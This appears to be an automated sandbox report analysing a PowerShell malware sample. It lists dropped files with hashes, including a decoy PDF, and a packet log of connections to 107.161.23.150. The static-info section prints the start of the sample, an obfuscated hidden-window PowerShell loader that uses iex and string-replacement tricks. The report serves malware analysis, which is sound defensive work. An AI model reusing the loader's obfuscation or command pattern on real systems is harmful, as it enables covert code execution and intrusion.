                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynpxihkj.odr.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-19 06-51-24-922.log

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with very long lines (393)
                                                                                            Category:dropped
                                                                                            Size (bytes):16525
                                                                                            Entropy (8bit):5.376360055978702
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                            MD5:1336667A75083BF81E2632FABAA88B67
                                                                                            SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                            SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                            SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                            Malicious:false
                                                                                            Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):15112
                                                                                            Entropy (8bit):5.360168250450656
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:orKqupRpup+p1pQ/pZp4pwp0Wp9pbpJolo2vLeBeTeptOtutftWto5DMD8Dq6476:om1j8YHy/LGu6W79juxTA+aEkhAyAYOy
                                                                                            MD5:BE598FBFA18B99747CBFF7CC5FDA00DA
                                                                                            SHA1:2AEB5C49781679C318D7AF0852CA6BFBA7B92639
                                                                                            SHA-256:FA0F859DF175BBD045A31D4ECEED2768A58899BC361679E3984610643A377845
                                                                                            SHA-512:6393AF82296308011C3539BBD3005709F3287FEAD6496D93FA5D1AAEF799E5B517A1B488695D209EA55274396E3E609174EF8E2CB3B3D5D6F27BBFDC2E73C18E
                                                                                            Malicious:false
                                                                                            Preview:SessionID=0ce9b234-8b98-421a-852c-6204b7d58950.1734609084932 Timestamp=2024-12-19T06:51:24:932-0500 ThreadID=7468 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=0ce9b234-8b98-421a-852c-6204b7d58950.1734609084932 Timestamp=2024-12-19T06:51:24:933-0500 ThreadID=7468 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=0ce9b234-8b98-421a-852c-6204b7d58950.1734609084932 Timestamp=2024-12-19T06:51:24:934-0500 ThreadID=7468 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=0ce9b234-8b98-421a-852c-6204b7d58950.1734609084932 Timestamp=2024-12-19T06:51:24:934-0500 ThreadID=7468 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=0ce9b234-8b98-421a-852c-6204b7d58950.1734609084932 Timestamp=2024-12-19T06:51:24:934-0500 ThreadID=7468 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):29752
                                                                                            Entropy (8bit):5.403631967939493
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbY:E
                                                                                            MD5:6E0AE389E0FBB315C897326D1BF4D9EA
                                                                                            SHA1:E8D15A0B85CF79C6C74234159E776ED3A881A5F6
                                                                                            SHA-256:8656EE7215D02D5D1C7109CF6FDE01A93A0F28F16613D64A0612AF22A9E7D9A5
                                                                                            SHA-512:4BD134E1B2C9E17B9D2F13F413AD4EAD0D2D80BC7AAB7F48E7ED404FCD38BE289A82AC38AEB158B547A65C50ADA00CFB58DFDEA4E46692542B5A7C22ABA02918
                                                                                            Malicious:false
                                                                                            Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-

                                                                                            C:\Users\user\AppData\Local\Temp\acrocef_low\1f9692c8-c196-479d-bea9-7d4938baa4b3.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                            Category:dropped
                                                                                            Size (bytes):758601
                                                                                            Entropy (8bit):7.98639316555857
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                            MD5:3A49135134665364308390AC398006F1
                                                                                            SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                            SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                            SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                            Malicious:false
                                                                                            Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                            C:\Users\user\AppData\Local\Temp\acrocef_low\2a351027-261b-46cd-8fe6-1781f13d32b5.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
                                                                                            Category:dropped
                                                                                            Size (bytes):1419751
                                                                                            Entropy (8bit):7.976496077007677
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/xVwYIGNPoeWL07oYGZSdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07c:JVwZG7WLxYGZS3mlind9i4ufFXpAXkrj
                                                                                            MD5:22A99634354D0BAFF51C81188E41E3E6
                                                                                            SHA1:631D42D5283865133D98C6A9532210D220B485D2
                                                                                            SHA-256:0DFCFC14AA6415CE22ECA0D053B8F08C83FA08A0180C2C57EAE70D3B27D33E04
                                                                                            SHA-512:53F37C4971FE18775A7F7AFDA19FC052B31139AC67BDD24D631735F4D6E31BCB0B613B0D459598FA30FC98D27BD0709F1CCD32B07D5B381FE27401060CA753A1
                                                                                            Malicious:false
                                                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                            C:\Users\user\AppData\Local\Temp\acrocef_low\3ef4dcef-a23b-47d3-8f4f-e8e7fdf9cbcd.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                                            Category:dropped
                                                                                            Size (bytes):1407294
                                                                                            Entropy (8bit):7.97605879016224
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/xaWo7oSwYIGNPJlPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tGZd:JaW9SwZGJv3mlind9i4ufFXpAXkrfUsb
                                                                                            MD5:42FC8AEDABAE0F670104774CF07892C8
                                                                                            SHA1:DA92B8DFC846147F5E08B1CB0F2664A31B9D6D49
                                                                                            SHA-256:552985411551C39D1688991A2C5EBE9192B11CB0DB21269BDE0D699EE1F1EEE7
                                                                                            SHA-512:5BAA575657FE4E31CA800ECE12E105028391F1849ADF00AE0A4A718ECC762D36767EEFABC0C7664F9B677C92BF48DDC5F2FDBA4537C04D5AD82B93F21863AE50
                                                                                            Malicious:false
                                                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                            C:\Users\user\AppData\Local\Temp\acrocef_low\558b957d-5ab7-4e6f-8a30-37b644b1f162.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                            Category:dropped
                                                                                            Size (bytes):386528
                                                                                            Entropy (8bit):7.9736851559892425
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                            Malicious:false
                                                                                            Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6222
                                                                                            Entropy (8bit):3.7046333041333366
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:OJOBsxCQbU2K+uplukvhkvklCywWn23+MjSOkQlzXSogZo1X+MjSOkQl/XSogZoH:RCxC1oDkvhkvCCtMW1bAHPW1bMHu
                                                                                            MD5:5AC2735075FEC58A1913C30844B3A91A
                                                                                            SHA1:69FDD89F9F430BF9E071DFF3B027B2986BD12467
                                                                                            SHA-256:DFA2D7F70099428B8C4684895EF736936AA0D56F8C57D2AC61BD227285854F55
                                                                                            SHA-512:E7AA3FF41096D9C4B6EE4B102077664A1A9BD61004A03727DED58F36FF5C8D7604356D556CA26CF287D682CFFAB9865FCA99D6656680300CD1B136AAFF478312
                                                                                            Malicious:false
                                                                                            Preview:...................................FL..................F.".. ...d......[".J.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........F.R.....J.R......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y\^....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Yb^..Roaming.@......DWSl.Yb^....C.....................G.(.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y\^....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y\^....E......................'.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y\^....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y\^....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Ye^....q...........

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QSJB1T57YI9TH06LXKA2.temp

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6222
                                                                                            Entropy (8bit):3.7046333041333366
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:OJOBsxCQbU2K+uplukvhkvklCywWn23+MjSOkQlzXSogZo1X+MjSOkQl/XSogZoH:RCxC1oDkvhkvCCtMW1bAHPW1bMHu
                                                                                            MD5:5AC2735075FEC58A1913C30844B3A91A
                                                                                            SHA1:69FDD89F9F430BF9E071DFF3B027B2986BD12467
                                                                                            SHA-256:DFA2D7F70099428B8C4684895EF736936AA0D56F8C57D2AC61BD227285854F55
                                                                                            SHA-512:E7AA3FF41096D9C4B6EE4B102077664A1A9BD61004A03727DED58F36FF5C8D7604356D556CA26CF287D682CFFAB9865FCA99D6656680300CD1B136AAFF478312
                                                                                            Malicious:false
                                                                                            Preview:...................................FL..................F.".. ...d......[".J.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........F.R.....J.R......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y\^....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Yb^..Roaming.@......DWSl.Yb^....C.....................G.(.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y\^....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y\^....E......................'.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y\^....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y\^....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Ye^....q...........

                                                                                            C:\Users\user\Desktop\List of Required items and services.pdf

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                            Category:dropped
                                                                                            Size (bytes):871324
                                                                                            Entropy (8bit):7.827941732382635
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                                            MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                                                            SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                                                            SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                                                            SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                                                            Malicious:false
                                                                                            Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T

                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):55
                                                                                            Entropy (8bit):4.306461250274409
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                            Malicious:false
                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:ASCII text, with very long lines (841), with no line terminators
                                                                                            Entropy (8bit):5.343717723196597
                                                                                            TrID:
                                                                                              File name:gCXzb0K8Ci.ps1
                                                                                              File size:841 bytes
                                                                                              MD5:f66c1baa8805a9f3d84f0d7b253b62b0
                                                                                              SHA1:482e3694cd0de951055dc9c58af3c351fb8a5a78
                                                                                              SHA256:d4e49fb44f2d9c6b2626e82bfbded73e771f55e506618c5a2b47afbcf218bc24
                                                                                              SHA512:c00e98e04fece2afa819794a30ae0dbcbae8ee6796c9657916d323feaa438e7e084125214828e9144fb884501c5274370529ad136f8b4915f1592a0755126bda
                                                                                              SSDEEP:24:Xbh7GsAPNjWIfnLBgQWAa6KzswLv36pzo2G:xwKIllKzswjcoj
                                                                                              TLSH:9001128727D356F36501F01960CC9A3E36799E4664D914B3B6F98E1710ECA3D0DC1936
                                                                                              File Content Preview:powershell -win hidden $m3jbla=iex($('[Environment]::GetEvh2s'''.Replace('vh2','nvironmentVariable(''public'') + ''\\j5mh76.vb')));$flol=iex($('[Environment]::GetEvh2s'''.Replace('vh2','nvironmentVariable(''public'') + ''\\v49.vb')));function getit([strin

                                                                                              File Icon

                                                                                              Icon Hash:3270d6baae77db44

                                                                                              Network Behavior

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 19, 2024 12:51:18.814944029 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:18.814995050 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:18.815088987 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:18.826721907 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:18.826734066 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.079413891 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.079495907 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.083570004 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.083587885 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.083848000 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.094868898 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.135333061 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.525202990 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.572397947 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.644756079 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.644766092 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.644819021 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.644840956 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.644855022 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.644948006 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.644978046 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.645142078 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.758049965 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.758073092 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.758187056 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.758208990 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.758249998 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.798417091 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.798444033 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.798522949 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.798535109 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.798574924 CET49704443192.168.2.5107.161.23.150
